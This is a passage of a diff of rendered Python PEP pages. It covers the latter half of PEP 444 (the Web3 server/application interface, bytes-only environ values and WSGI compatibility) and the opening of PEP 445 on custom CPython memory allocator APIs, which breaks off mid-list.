Web3 applications return a tuple in the form (status, headers, +body). If the server supports asynchronous applications +(web3.async), the response may be a callable object (which accepts no +arguments).
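One possible minimal application of this shape (a sketch, not
normative): all three elements of the returned tuple are built from
bytes, as required below.

    def application(environ):
        status = b'200 OK'
        headers = [(b'Content-Type', b'text/plain')]
        body = [b'Hello world!\n']
        return status, headers, body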

+

The status value is assumed by a gateway or server to be an HTTP +“status” bytes instance like b'200 OK' or b'404 Not Found'. +That is, it is a string consisting of a Status-Code and a +Reason-Phrase, in that order and separated by a single space, with no +surrounding whitespace or other characters. (See RFC 2616, Section +6.1.1 for more information.) The string must not contain control +characters, and must not be terminated with a carriage return, +linefeed, or combination thereof.

+

The headers value is assumed by a gateway or server to be a +literal Python list of (header_name, header_value) tuples. Each +header_name must be a bytes instance representing a valid HTTP +header field-name (as defined by RFC 2616, Section 4.2), without a +trailing colon or other punctuation. Each header_value must be a +bytes instance and must not include any control characters, +including carriage returns or linefeeds, either embedded or at the +end. (These requirements are to minimize the complexity of any +parsing that must be performed by servers, gateways, and intermediate +response processors that need to inspect or modify response headers.)

+

In general, the server or gateway is responsible for ensuring that
correct headers are sent to the client: if the application omits a
header required by HTTP (or other relevant specifications that are in
effect), the server or gateway must add it. For example, the HTTP
Date: and Server: headers would normally be supplied by the
server or gateway. However, the gateway must not override values with
the same name if they are emitted by the application.

+

(A reminder for server/gateway authors: HTTP header names are +case-insensitive, so be sure to take that into consideration when +examining application-supplied headers!)

+

Applications and middleware are forbidden from using HTTP/1.1
“hop-by-hop” features or headers, any equivalent features in HTTP/1.0,
or any headers that would affect the persistence of the client’s
connection to the web server. These features are the exclusive
province of the actual web server, and a server or gateway should
consider it a fatal error for an application to attempt sending them,
and raise an error if they are supplied as return values from an
application in the headers structure. (For more specifics on
“hop-by-hop” features and headers, please see the Other HTTP
Features section below.)
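A server or gateway might enforce this rule with a check along these
lines (a sketch; the function name is hypothetical, and the header
list is the hop-by-hop set given by RFC 2616, Section 13.5.1):

    HOP_BY_HOP = frozenset([
        b'connection', b'keep-alive', b'proxy-authenticate',
        b'proxy-authorization', b'te', b'trailers',
        b'transfer-encoding', b'upgrade',
    ])

    def check_headers(headers):
        # Treat any application-supplied hop-by-hop header as a fatal error.
        for name, value in headers:
            if name.lower() in HOP_BY_HOP:
                raise AssertionError('hop-by-hop header not allowed: %r' % (name,))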
Dealing with Compatibility Across Python Versions

+

Creating Web3 code that runs under both Python 2.6/2.7 and Python 3.1+ +requires some care on the part of the developer. In general, the Web3 +specification assumes a certain level of equivalence between the +Python 2 str type and the Python 3 bytes type. For example, +under Python 2, the values present in the Web3 environ will be +instances of the str type; in Python 3, these will be instances of +the bytes type. The Python 3 bytes type does not possess all +the methods of the Python 2 str type, and some methods which it +does possess behave differently than the Python 2 str type. +Effectively, to ensure that Web3 middleware and applications work +across Python versions, developers must do these things:

+
1. Do not assume comparison equivalence between text values and bytes
   values. If you do so, your code may work under Python 2, but it
   will not work properly under Python 3. For example, don't write
   somebytes == 'abc'. This will sometimes be true on Python 2
   but it will never be true on Python 3, because a sequence of bytes
   never compares equal to a string under Python 3. Instead, always
   compare a bytes value with a bytes value, e.g.
   somebytes == b'abc'. Code which does this is compatible with and
   works the same in Python 2.6, 2.7, and 3.1. The b in front of
   'abc' signals to Python 3 that the value is a literal bytes
   instance; under Python 2 it's a forward compatibility placebo.
2. Don't use the __contains__ method (directly or indirectly) of
   items that are meant to be byteslike without ensuring that its
   argument is also a bytes instance. If you do so, your code may
   work under Python 2, but it will not work properly under Python 3.
   For example, 'abc' in somebytes will raise a TypeError
   under Python 3, but it will return True under Python 2.6 and
   2.7. However, b'abc' in somebytes will work the same on both
   versions. In Python 3.2, this restriction may be partially
   removed, as it's rumored that bytes types may obtain a __mod__
   implementation.
3. __getitem__ should not be used: indexing a bytes instance returns
   an integer under Python 3 but a one-character string under
   Python 2. Use slicing instead.
4. Don't try to use the format method or the __mod__ method of
   instances of bytes (directly or indirectly). In Python 2, the
   str type which we treat equivalently to Python 3's bytes
   supports these methods, but Python 3's actual bytes instances
   don't. If you use these methods, your code will work under
   Python 2, but not under Python 3.
5. Do not try to concatenate a bytes value with a string value. This
   may work under Python 2, but it will not work under Python 3. For
   example, doing 'abc' + somebytes will work under Python 2, but
   it will result in a TypeError under Python 3. Instead, always
   make sure you're concatenating two items of the same type,
   e.g. b'abc' + somebytes.

(A short sketch restating these rules as code follows this list.)
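The following sketch restates the rules above as concrete expressions;
every line behaves identically under Python 2.6/2.7 and Python 3.1+:

    somebytes = b'abc123'

    somebytes == b'abc123'            # compare bytes with bytes, never with text
    b'abc' in somebytes               # containment with a bytes operand
    somebytes[0:1] == b'a'            # slice instead of indexing
    b'prefix-' + somebytes            # concatenate bytes with bytes only
    b'n=' + str(42).encode('ascii')   # build bytes without format() or __mod__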

Web3 expects byte values in other places, such as in all the values +returned by an application.

+

In short, to ensure compatibility of Web3 application code between +Python 2 and Python 3, in Python 2, treat CGI and server variable +values in the environment as if they had the Python 3 bytes API +even though they actually have a more capable API. Likewise for all +stringlike values returned by a Web3 application.
Buffering and Streaming

+

Generally speaking, applications will achieve the best throughput by +buffering their (modestly-sized) output and sending it all at once. +This is a common approach in existing frameworks: the output is +buffered in a StringIO or similar object, then transmitted all at +once, along with the response headers.

+

The corresponding approach in Web3 is for the application to simply
return a single-element body iterable (such as a list) containing
the response body as a single string. This is the recommended
approach for the vast majority of application functions that render
HTML pages whose text easily fits in memory.

+

For large files, however, or for specialized uses of HTTP streaming +(such as multipart “server push”), an application may need to provide +output in smaller blocks (e.g. to avoid loading a large file into +memory). It’s also sometimes the case that part of a response may be +time-consuming to produce, but it would be useful to send ahead the +portion of the response that precedes it.

+

In these cases, applications will usually return a body iterator +(often a generator-iterator) that produces the output in a +block-by-block fashion. These blocks may be broken to coincide with +multipart boundaries (for “server push”), or just before +time-consuming tasks (such as reading another block of an on-disk +file).
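For example, a sketch of a body iterator that streams a file in blocks
(the path and block size here are purely illustrative):

    def file_body(path, block_size=8192):
        # Yield the file block by block so the server can transmit each
        # block as soon as it is produced, instead of buffering the
        # whole file in memory.
        with open(path, 'rb') as f:
            while True:
                block = f.read(block_size)
                if not block:
                    break
                yield block

    def app(environ):
        return (b'200 OK',
                [(b'Content-Type', b'application/octet-stream')],
                file_body('/var/data/large-file.bin'))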

+

Web3 servers, gateways, and middleware must not delay the +transmission of any block; they must either fully transmit the +block to the client, or guarantee that they will continue transmission +even while the application is producing its next block. A +server/gateway or middleware may provide this guarantee in one of +three ways:

+
1. Send the entire block to the operating system (and request that any
   O/S buffers be flushed) before returning control to the
   application, OR
2. Use a different thread to ensure that the block continues to be
   transmitted while the application produces the next block.
3. (Middleware only) send the entire block to its parent
   gateway/server.

By providing this guarantee, Web3 allows applications to ensure that +transmission will not become stalled at an arbitrary point in their +output data. This is critical for proper functioning of +e.g. multipart “server push” streaming, where data between multipart +boundaries should be transmitted in full to the client.
Unicode Issues

+

HTTP does not directly support Unicode, and neither does this +interface. All encoding/decoding must be handled by the +application; all values passed to or from the server must be of +the Python 3 type bytes or instances of the Python 2 type str, +not Python 2 unicode or Python 3 str objects.

+

All “bytes instances” referred to in this specification must:

+
• On Python 2, be of type str.
• On Python 3, be of type bytes.

All “bytes instances” must not:

+
• On Python 2, be of type unicode.
• On Python 3, be of type str.

The result of using a textlike object where a byteslike object is +required is undefined.

+

Values returned from a Web3 app as a status or as response headers +must follow RFC 2616 with respect to encoding. That is, the bytes +returned must contain a character stream of ISO-8859-1 characters, or +the character stream should use RFC 2047 MIME encoding.
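For illustration only, the bytes for a status line or header value
might be produced from native text and encoded explicitly (a sketch;
'iso-8859-1' is the codec name for ISO-8859-1 in both Python 2 and 3):

    status = '200 OK'.encode('iso-8859-1')
    headers = [
        (b'Content-Type', 'text/plain; charset=utf-8'.encode('iso-8859-1')),
    ]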

+

On Python platforms which do not have a native bytes-like type +(e.g. IronPython, etc.), but instead which generally use textlike +strings to represent bytes data, the definition of “bytes instance” +can be changed: their “bytes instances” must be native strings that +contain only code points representable in ISO-8859-1 encoding +(\u0000 through \u00FF, inclusive). It is a fatal error for +an application on such a platform to supply strings containing any +other Unicode character or code point. Similarly, servers and +gateways on those platforms must not supply strings to an +application containing any other Unicode characters.
HTTP 1.1 Expect/Continue

+

Servers and gateways that implement HTTP 1.1 must provide +transparent support for HTTP 1.1’s “expect/continue” mechanism. This +may be done in any of several ways:

+
1. Respond to requests containing an Expect: 100-continue request
   with an immediate “100 Continue” response, and proceed normally.
2. Proceed with the request normally, but provide the application with
   a web3.input stream that will send the “100 Continue” response
   if/when the application first attempts to read from the input
   stream. The read request must then remain blocked until the client
   responds.
3. Wait until the client decides that the server does not support
   expect/continue, and sends the request body on its own. (This is
   suboptimal, and is not recommended.)

Note that these behavior restrictions do not apply for HTTP 1.0 +requests, or for requests that are not directed to an application +object. For more information on HTTP 1.1 Expect/Continue, see +RFC 2616, sections 8.2.3 and 10.1.1.
Other HTTP Features

+

In general, servers and gateways should “play dumb” and allow the +application complete control over its output. They should only make +changes that do not alter the effective semantics of the application’s +response. It is always possible for the application developer to add +middleware components to supply additional features, so server/gateway +developers should be conservative in their implementation. In a +sense, a server should consider itself to be like an HTTP “gateway +server”, with the application being an HTTP “origin server”. (See +RFC 2616, section 1.3, for the definition of these terms.)

+

However, because Web3 servers and applications do not communicate via +HTTP, what RFC 2616 calls “hop-by-hop” headers do not apply to Web3 +internal communications. Web3 applications must not generate any +“hop-by-hop” headers, +attempt to use HTTP features that would +require them to generate such headers, or rely on the content of any +incoming “hop-by-hop” headers in the environ dictionary. Web3 +servers must handle any supported inbound “hop-by-hop” headers on +their own, such as by decoding any inbound Transfer-Encoding, +including chunked encoding if applicable.

+

Applying these principles to a variety of HTTP features, it should be +clear that a server may handle cache validation via the +If-None-Match and If-Modified-Since request headers and the +Last-Modified and ETag response headers. However, it is not +required to do this, and the application should perform its own +cache validation if it wants to support that feature, since the +server/gateway is not required to do such validation.

+

Similarly, a server may re-encode or transport-encode an +application’s response, but the application should use a suitable +content encoding on its own, and must not apply a transport +encoding. A server may transmit byte ranges of the application’s +response if requested by the client, and the application doesn’t +natively support byte ranges. Again, however, the application +should perform this function on its own if desired.

+

Note that these restrictions on applications do not necessarily mean +that every application must reimplement every HTTP feature; many HTTP +features can be partially or fully implemented by middleware +components, thus freeing both server and application authors from +implementing the same features over and over again.
Thread Support

+

Thread support, or lack thereof, is also server-dependent. Servers
that can run multiple requests in parallel should also provide
the option of running an application in a single-threaded fashion, so
that applications or frameworks that are not thread-safe may still be
used with that server.
Implementation/Application Notes

+
+

Server Extension APIs

+

Some server authors may wish to expose more advanced APIs, that +application or framework authors can use for specialized purposes. +For example, a gateway based on mod_python might wish to expose +part of the Apache API as a Web3 extension.

+

In the simplest case, this requires nothing more than defining an +environ variable, such as mod_python.some_api. But, in many +cases, the possible presence of middleware can make this difficult. +For example, an API that offers access to the same HTTP headers that +are found in environ variables, might return different data if +environ has been modified by middleware.

+

In general, any extension API that duplicates, supplants, or bypasses +some portion of Web3 functionality runs the risk of being incompatible +with middleware components. Server/gateway developers should not +assume that nobody will use middleware, because some framework +developers specifically organize their frameworks to function almost +entirely as middleware of various kinds.

+

So, to provide maximum compatibility, servers and gateways that +provide extension APIs that replace some Web3 functionality, must +design those APIs so that they are invoked using the portion of the +API that they replace. For example, an extension API to access HTTP +request headers must require the application to pass in its current +environ, so that the server/gateway may verify that HTTP headers +accessible via the API have not been altered by middleware. If the +extension API cannot guarantee that it will always agree with +environ about the contents of HTTP headers, it must refuse service +to the application, e.g. by raising an error, returning None +instead of a header collection, or whatever is appropriate to the API.

+

These guidelines also apply to middleware that adds information such +as parsed cookies, form variables, sessions, and the like to +environ. Specifically, such middleware should provide these +features as functions which operate on environ, rather than simply +stuffing values into environ. This helps ensure that information +is calculated from environ after any middleware has done any URL +rewrites or other environ modifications.
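A sketch of this guideline (the function and cookie name are purely
illustrative): rather than storing a parsed session in environ,
middleware would expose a function that derives it from the current
environ on each call:

    def get_session_id(environ):
        # Recomputed from the *current* environ, so it reflects any URL
        # rewriting or other environ changes made by other middleware.
        cookie = environ.get('HTTP_COOKIE', b'')
        for part in cookie.split(b';'):
            name, _, value = part.strip().partition(b'=')
            if name == b'session_id':
                return value
        return None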

+

It is very important that these “safe extension” rules be followed by +both server/gateway and middleware developers, in order to avoid a +future in which middleware developers are forced to delete any and all +extension APIs from environ to ensure that their mediation isn’t +being bypassed by applications using those extensions!

+
+
+

Application Configuration

+

This specification does not define how a server selects or obtains an +application to invoke. These and other configuration options are +highly server-specific matters. It is expected that server/gateway +authors will document how to configure the server to execute a +particular application object, and with what options (such as +threading options).

+

Framework authors, on the other hand, should document how to create an +application object that wraps their framework’s functionality. The +user, who has chosen both the server and the application framework, +must connect the two together. However, since both the framework and +the server have a common interface, this should be merely a mechanical +matter, rather than a significant engineering effort for each new +server/framework pair.

+

Finally, some applications, frameworks, and middleware may wish to use
the environ dictionary to receive simple string configuration
options. Servers and gateways should support this by allowing an
application's deployer to specify name-value pairs to be placed in
environ. In the simplest case, this support can consist merely of
copying all operating system-supplied environment variables from
os.environ into the environ dictionary, since the deployer can in
principle configure these externally to the server or, in the CGI
case, set them via the server's configuration files.

+

Applications should try to keep such required variables to a +minimum, since not all servers will support easy configuration of +them. Of course, even in the worst case, persons deploying an +application can create a script to supply the necessary configuration +values:

+
from the_app import application
+
+def new_app(environ):
+    environ['the_app.configval1'] = b'something'
+    return application(environ)
+
+
+

But, most existing applications and frameworks will probably only need +a single configuration value from environ, to indicate the +location of their application or framework-specific configuration +file(s). (Of course, applications should cache such configuration, to +avoid having to re-read it upon each invocation.)

+
+
+

URL Reconstruction

+

If an application wishes to reconstruct a request’s complete URL (as a +bytes object), it may do so using the following algorithm:

+
host = environ.get('HTTP_HOST')

scheme = environ['web3.url_scheme']
port = environ['SERVER_PORT']
query = environ['QUERY_STRING']

url = scheme + b'://'

if host:
    url += host
else:
    url += environ['SERVER_NAME']

    if scheme == b'https':
        if port != b'443':
            url += b':' + port
    else:
        if port != b'80':
            url += b':' + port

# web3.script_name and web3.path_info hold the original URL-encoded
# values and can be used as-is; the URL-decoded CGI variants must be
# re-quoted (url_quote is assumed to URL-quote a bytes value and
# return bytes) before being placed back into a URL.
if 'web3.script_name' in environ:
    url += environ['web3.script_name']
else:
    url += url_quote(environ['SCRIPT_NAME'])
if 'web3.path_info' in environ:
    url += environ['web3.path_info']
else:
    url += url_quote(environ['PATH_INFO'])
if query:
    url += b'?' + query
+

Note that such a reconstructed URL may not be precisely the same URI +as requested by the client. Server rewrite rules, for example, may +have modified the client’s originally requested URL to place it in a +canonical form.
Open Questions

+
• file_wrapper replacement. Currently nothing is specified here,
  but it is clear that the old system of in-band signalling is broken
  if it does not provide a way for middleware in the processing chain
  to determine whether the response is a file wrapper.
+
+

Points of Contention

+

Outlined below are potential points of contention regarding this +specification.

+
+

WSGI 1.0 Compatibility

+

Components written using the WSGI 1.0 specification will not +transparently interoperate with components written using this +specification. That’s because the goals of this proposal and the +goals of WSGI 1.0 are not directly aligned.

+

WSGI 1.0 is obliged to provide specification-level backwards +compatibility with versions of Python between 2.2 and 2.7. This +specification, however, ditches Python 2.5 and lower compatibility in +order to provide compatibility between relatively recent versions of +Python 2 (2.6 and 2.7) as well as relatively recent versions of Python +3 (3.1).

+

It is currently impossible to write components which work reliably +under both Python 2 and Python 3 using the WSGI 1.0 specification, +because the specification implicitly posits that CGI and server +variable values in the environ and values returned via +start_response represent a sequence of bytes that can be addressed +using the Python 2 string API. It posits such a thing because that +sort of data type was the sensible way to represent bytes in all +Python 2 versions, and WSGI 1.0 was conceived before Python 3 existed.

+

Python 3’s str type supports the full API provided by the Python 2
str type, but Python 3’s str type does not represent a
sequence of bytes; it instead represents text. Therefore, using it to
represent environ values also requires that the environ byte sequence
be decoded to text via some encoding. We cannot decode these bytes to
text (at least in any way where the decoding has any meaning other
than as a tunnelling mechanism) without widening the scope of WSGI to
include server and gateway knowledge of decoding policies and
mechanics. WSGI 1.0 never concerned itself with encoding and
decoding. It made statements about allowable transport values, and
suggested that various values might be best decoded as one encoding or
another, but it never required a server to perform any decoding before
placing values into the environ.

+

Python 3 does not have a stringlike type that can be used instead to +represent bytes: it has a bytes type. A bytes type operates quite +a bit like a Python 2 str in Python 3.1+, but it lacks behavior +equivalent to str.__mod__ and its iteration protocol, and +containment, sequence treatment, and equivalence comparisons are +different.

+

In either case, there is no type in Python 3 that behaves just like +the Python 2 str type, and a way to create such a type doesn’t +exist because there is no such thing as a “String ABC” which would +allow a suitable type to be built. Due to this design +incompatibility, existing WSGI 1.0 servers, middleware, and +applications will not work under Python 3, even after they are run +through 2to3.

+

Existing Web-SIG discussions about updating the WSGI specification so +that it is possible to write a WSGI application that runs in both +Python 2 and Python 3 tend to revolve around creating a +specification-level equivalence between the Python 2 str type +(which represents a sequence of bytes) and the Python 3 str type +(which represents text). Such an equivalence becomes strained in +various areas, given the different roles of these types. An arguably +more straightforward equivalence exists between the Python 3 bytes +type API and a subset of the Python 2 str type API. This +specification exploits this subset equivalence.

+

In the meantime, aside from any Python 2 vs. Python 3 compatibility +issue, as various discussions on Web-SIG have pointed out, the WSGI +1.0 specification is too general, providing support (via .write) +for asynchronous applications at the expense of implementation +complexity. This specification uses the fundamental incompatibility +between WSGI 1.0 and Python 3 as a natural divergence point to create +a specification with reduced complexity by changing specialized +support for asynchronous applications.

+

To provide backwards compatibility for older WSGI 1.0 applications, so +that they may run on a Web3 stack, it is presumed that Web3 middleware +will be created which can be used “in front” of existing WSGI 1.0 +applications, allowing those existing WSGI 1.0 applications to run +under a Web3 stack. This middleware will require, when under Python +3, an equivalence to be drawn between Python 3 str types and the +bytes values represented by the HTTP request and all the attendant +encoding-guessing (or configuration) it implies.

+
+

Note

+

Such middleware might in the future, instead of drawing an +equivalence between Python 3 str and HTTP byte values, make use +of a yet-to-be-created “ebytes” type (aka “bytes-with-benefits”), +particularly if a String ABC proposal is accepted into the Python +core and implemented.

+
+

Conversely, it is presumed that WSGI 1.0 middleware will be created +which will allow a Web3 application to run behind a WSGI 1.0 stack on +the Python 2 platform.

+
+
+

Environ and Response Values as Bytes

+

Casual middleware and application writers may consider the use of +bytes as environment values and response values inconvenient. In +particular, they won’t be able to use common string formatting +functions such as ('%s' % bytes_val) or +bytes_val.format('123') because bytes don’t have the same API as +strings on platforms such as Python 3 where the two types differ. +Likewise, on such platforms, stdlib HTTP-related API support for using +bytes interchangeably with text can be spotty. In places where bytes +are inconvenient or incompatible with library APIs, middleware and +application writers will have to decode such bytes to text explicitly. +This is particularly inconvenient for middleware writers: to work with +environment values as strings, they’ll have to decode them from an +implied encoding and if they need to mutate an environ value, they’ll +then need to encode the value into a byte stream before placing it +into the environ. While the use of bytes by the specification as +environ values might be inconvenient for casual developers, it +provides several benefits.

+

Using bytes types to represent HTTP and server values to an +application most closely matches reality because HTTP is fundamentally +a bytes-oriented protocol. If the environ values are mandated to be +strings, each server will need to use heuristics to guess about the +encoding of various values provided by the HTTP environment. Using +all strings might increase casual middleware writer convenience, but +will also lead to ambiguity and confusion when a value cannot be +decoded to a meaningful non-surrogate string.

+

Use of bytes as environ values avoids any potential for the need for +the specification to mandate that a participating server be informed +of encoding configuration parameters. If environ values are treated +as strings, and so must be decoded from bytes, configuration +parameters may eventually become necessary as policy clues from the +application deployer. Such a policy would be used to guess an +appropriate decoding strategy in various circumstances, effectively +placing the burden for enforcing a particular application encoding +policy upon the server. If the server must serve more than one +application, such configuration would quickly become complex. Many +policies would also be impossible to express declaratively.

+

In reality, HTTP is a complicated and legacy-fraught protocol which +requires a complex set of heuristics to make sense of. It would be +nice if we could allow this protocol to protect us from this +complexity, but we cannot do so reliably while still providing to +application writers a level of control commensurate with reality. +Python applications must often deal with data embedded in the +environment which not only must be parsed by legacy heuristics, but +does not conform even to any existing HTTP specification. While +these eventualities are unpleasant, they crop up with regularity, +making it impossible and undesirable to hide them from application +developers, as application developers are the only people who are able +to decide upon an appropriate action when an HTTP specification +violation is detected.

+

Some have argued for mixed use of bytes and string values as environ +values. This proposal avoids that strategy. Sole use of bytes as +environ values makes it possible to fit this specification entirely in +one’s head; you won’t need to guess about which values are strings and +which are bytes.

+

This protocol would also fit in a developer’s head if all environ +values were strings, but this specification doesn’t use that strategy. +This will likely be the point of greatest contention regarding the use +of bytes. In defense of bytes: developers often prefer protocols with +consistent contracts, even if the contracts themselves are suboptimal. +If we hide encoding issues from a developer until a value that +contains surrogates causes problems after it has already reached +beyond the I/O boundary of their application, they will need to do a +lot more work to fix assumptions made by their application than if we +were to just present the problem much earlier in terms of “here’s some +bytes, you decode them”. This is also a counter-argument to the +“bytes are inconvenient” assumption: while presenting bytes to an +application developer may be inconvenient for a casual application +developer who doesn’t care about edge cases, they are extremely +convenient for the application developer who needs to deal with +complex, dirty eventualities, because use of bytes allows him the +appropriate level of control with a clear separation of +responsibility.

+

If the protocol uses bytes, it is presumed that libraries will be +created to make working with bytes-only in the environ and within +return values more pleasant; for example, analogues of the WSGI 1.0 +libraries named “WebOb” and “Werkzeug”. Such libraries will fill the +gap between convenience and control, allowing the spec to remain +simple and regular while still allowing casual authors a convenient +way to create Web3 middleware and application components. This seems +to be a reasonable alternative to baking encoding policy into the +protocol, because many such libraries can be created independently +from the protocol, and application developers can choose the one that +provides them the appropriate levels of control and convenience for a +particular job.

+

Here are some alternatives to using all bytes:

+
• Have the server decode all values representing CGI and server
  environ values into strings using the latin-1 encoding, which is
  lossless. Smuggle any undecodable bytes within the resulting
  string.
• Decode all CGI and server environ values to strings using the
  utf-8 encoding with the surrogateescape error handler. This
  does not work under any existing Python 2.
• Present some values as bytes and other values as strings, as
  decided by their typical usages.
+
+

Applications Should be Allowed to Read web3.input Past CONTENT_LENGTH

+

At [5], Graham Dumpleton makes the assertion that wsgi.input +should be required to return the empty string as a signifier of +out-of-data, and that applications should be allowed to read past the +number of bytes specified in CONTENT_LENGTH, depending only upon +the empty string as an EOF marker. WSGI relies on an application +“being well behaved and once all data specified by CONTENT_LENGTH +is read, that it processes the data and returns any response. That +same socket connection could then be used for a subsequent request.” +Graham would like WSGI adapters to be required to wrap raw socket +connections: “this wrapper object will need to count how much data has +been read, and when the amount of data reaches that as defined by +CONTENT_LENGTH, any subsequent reads should return an empty string +instead.” This may be useful to support chunked encoding and input +filters.
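A sketch of the counting wrapper Graham describes (the class name is
hypothetical):

    class LimitedInput(object):
        """Wrap a raw socket stream; return b'' once CONTENT_LENGTH is reached."""

        def __init__(self, stream, content_length):
            self.stream = stream
            self.remaining = content_length

        def read(self, size=-1):
            if self.remaining <= 0:
                return b''  # simulate end-of-file past CONTENT_LENGTH
            if size < 0 or size > self.remaining:
                size = self.remaining
            data = self.stream.read(size)
            self.remaining -= len(data)
            return data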

+
+
+

web3.input Unknown Length

+

There’s no documented way to indicate that there is content in +environ['web3.input'], but the content length is unknown.

+
+
+

read() of web3.input Should Support No-Size Calling Convention

+

At [5], Graham Dumpleton makes the assertion that the read() +method of wsgi.input should be callable without arguments, and +that the result should be “all available request content”. Needs +discussion.

+

Comment Armin: I changed the spec to require that from an +implementation. I had too much pain with that in the past already. +Open for discussions though.

+
+

Input Filters should set environ CONTENT_LENGTH to -1

+

At [5], Graham Dumpleton suggests that an input filter might set +environ['CONTENT_LENGTH'] to -1 to indicate that it mutated the +input.

+
+
+
+

headers as Literal List of Two-Tuples

+

Why do we make applications return a headers structure that is a +literal list of two-tuples? I think the iterability of headers +needs to be maintained while it moves up the stack, but I don’t think +we need to be able to mutate it in place at all times. Could we +loosen that requirement?

+

Comment Armin: Strong yes

+
+
+

Removed Requirement that Middleware Not Block

+

This requirement was removed: “middleware components must not
block iteration waiting for multiple values from an application
iterable. If the middleware needs to accumulate more data from the
application before it can produce any output, it must yield an
empty string.” This requirement existed to support asynchronous
applications and servers (see PEP 333’s “Middleware Handling of Block
Boundaries”). Asynchronous applications are now serviced explicitly
by the web3.async-capable protocol (a Web3 application callable may
itself return a callable).

+
+
+

web3.script_name and web3.path_info

+

These values are required to be placed into the environment by an +origin server under this specification. Unlike SCRIPT_NAME and +PATH_INFO, these must be the original URL-encoded variants +derived from the request URI. We probably need to figure out how +these should be computed originally, and what their values should be +if the server performs URL rewriting.

+
+
+

Long Response Headers

+

Bob Brewer notes on Web-SIG [6]:

+
+
Each header_value must not include any control characters, +including carriage returns or linefeeds, either embedded or at the +end. (These requirements are to minimize the complexity of any +parsing that must be performed by servers, gateways, and +intermediate response processors that need to inspect or modify +response headers.) (PEP 333)
+

That’s understandable, but HTTP headers are defined as (mostly) +*TEXT, and “words of *TEXT MAY contain characters from character +sets other than ISO-8859-1 only when encoded according to the rules of +RFC 2047.” [2] And RFC 2047 specifies that “an ‘encoded-word’ may +not be more than 75 characters long… If it is desirable to encode +more text than will fit in an ‘encoded-word’ of 75 characters, +multiple ‘encoded-word’s (separated by CRLF SPACE) may be used.” [3] +This satisfies HTTP header folding rules, as well: “Header fields can +be extended over multiple lines by preceding each extra line with at +least one SP or HT.” (PEP 333)

+

So in my reading of HTTP, some code somewhere should introduce +newlines in longish, encoded response header values. I see three +options:

+
1. Keep things as they are and disallow response header values if they
   contain words over 75 chars that are outside the ISO-8859-1
   character set.
2. Allow newline characters in WSGI response headers.
3. Require/strongly suggest WSGI servers to do the encoding and
   folding before sending the value over HTTP.
+
+

Request Trailers and Chunked Transfer Encoding

+

When using chunked transfer encoding on request content, the RFCs +allow there to be request trailers. These are like request headers +but come after the final null data chunk. These trailers are only +available when the chunked data stream is finite length and when it +has all been read in. Neither WSGI nor Web3 currently supports them.

+
+
+
+

References


Source: https://github.com/python/peps/blob/main/peps/pep-0444.rst

+

Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0445/index.html b/pep-0445/index.html
new file mode 100644
index 00000000000..efd1557b5ff
--- /dev/null
+++ b/pep-0445/index.html

PEP 445 – Add new APIs to customize Python memory allocators

Author: Victor Stinner <vstinner at python.org>
BDFL-Delegate: Antoine Pitrou <solipsis at pitrou.net>
Status: Final
Type: Standards Track
Created: 15-Jun-2013
Python-Version: 3.4
Resolution: Python-Dev message

Abstract

+

This PEP proposes new Application Programming Interfaces (API) to customize +Python memory allocators. The only implementation required to conform to +this PEP is CPython, but other implementations may choose to be compatible, +or to re-use a similar scheme.

+
+
+

Rationale

+

Use cases:

+
• Applications embedding Python which want to isolate Python memory from
  the memory of the application, or want to use a different memory
  allocator optimized for their Python usage
• Python running on embedded devices with low memory and slow CPU.
  A custom memory allocator can be used for efficiency and/or to get
  access to all the memory of the device.
• Debug tools for memory allocators:
    • track memory usage (find memory leaks)
    • get the location of a memory allocation: Python filename and line
      number, and the size of a memory block
    • detect buffer underflow, buffer overflow and misuse of Python
      allocator APIs (see Redesign Debug Checks on Memory Block
      Allocators as Hooks)
    • force memory allocations to fail to test handling of the
      MemoryError exception
+
+

Proposal

+
+

New Functions and Structures

+
• Add a new GIL-free (no need to hold the GIL) memory allocator:
    • void* PyMem_RawMalloc(size_t size)
    • void* PyMem_RawRealloc(void *ptr, size_t new_size)
    • void PyMem_RawFree(void *ptr)
    • The newly allocated memory will not have been initialized in any
      way.
    • Requesting zero bytes returns a distinct non-NULL pointer if
      possible, as if PyMem_Malloc(1) had been called instead.
• Add a new PyMemAllocator structure:

      typedef struct {
          /* user context passed as the first argument to the 3 functions */
          void *ctx;

          /* allocate a memory block */
          void* (*malloc) (void *ctx, size_t size);

          /* allocate or resize a memory block */
          void* (*realloc) (void *ctx, void *ptr, size_t new_size);

          /* release a memory block */
          void (*free) (void *ctx, void *ptr);
      } PyMemAllocator;

• Add a new PyMemAllocatorDomain enum to choose the Python
  allocator domain. Domains:
    • PYMEM_DOMAIN_RAW: PyMem_RawMalloc(), PyMem_RawRealloc()
      and PyMem_RawFree()
    • PYMEM_DOMAIN_MEM: PyMem_Malloc(), PyMem_Realloc() and
      PyMem_Free()
    • PYMEM_DOMAIN_OBJ: PyObject_Malloc(), PyObject_Realloc()
      and PyObject_Free()
• Add new functions to get and set memory block allocators:
    • void PyMem_GetAllocator(PyMemAllocatorDomain domain, PyMemAllocator *allocator)
    • void PyMem_SetAllocator(PyMemAllocatorDomain domain, PyMemAllocator *allocator)
    • The new allocator must return a distinct non-NULL pointer when
      requesting zero bytes.
    • For the PYMEM_DOMAIN_RAW domain, the allocator must be
      thread-safe: the GIL is not held when the allocator is called.
• Add a new PyObjectArenaAllocator structure:

      typedef struct {
          /* user context passed as the first argument to the 2 functions */
          void *ctx;

          /* allocate an arena */
          void* (*alloc) (void *ctx, size_t size);

          /* release an arena */
          void (*free) (void *ctx, void *ptr, size_t size);
      } PyObjectArenaAllocator;

• Add new functions to get and set the arena allocator used by
  pymalloc:
    • void PyObject_GetArenaAllocator(PyObjectArenaAllocator *allocator)
    • void PyObject_SetArenaAllocator(PyObjectArenaAllocator *allocator)
• Add a new function to reinstall the debug checks on memory allocators when
  a memory allocator is replaced with PyMem_SetAllocator():
    • void PyMem_SetupDebugHooks(void)
    • Install the debug hooks on all memory block allocators. The function can
      be called more than once; hooks are only installed once.
    • The function does nothing if Python is not compiled in debug mode.
• Memory block allocators always return NULL if size is greater than
  PY_SSIZE_T_MAX. The check is done before calling the inner
  function.
+

Note

+

The pymalloc allocator is optimized for objects smaller than 512 bytes +with a short lifetime. It uses memory mappings with a fixed size of 256 +KB called “arenas”.

+
+

Here is how the allocators are set up by default:

+
• PYMEM_DOMAIN_RAW, PYMEM_DOMAIN_MEM: malloc(),
  realloc() and free(); call malloc(1) when requesting zero
  bytes
• PYMEM_DOMAIN_OBJ: pymalloc allocator which falls back on
  PyMem_Malloc() for allocations larger than 512 bytes
• pymalloc arena allocator: VirtualAlloc() and VirtualFree() on
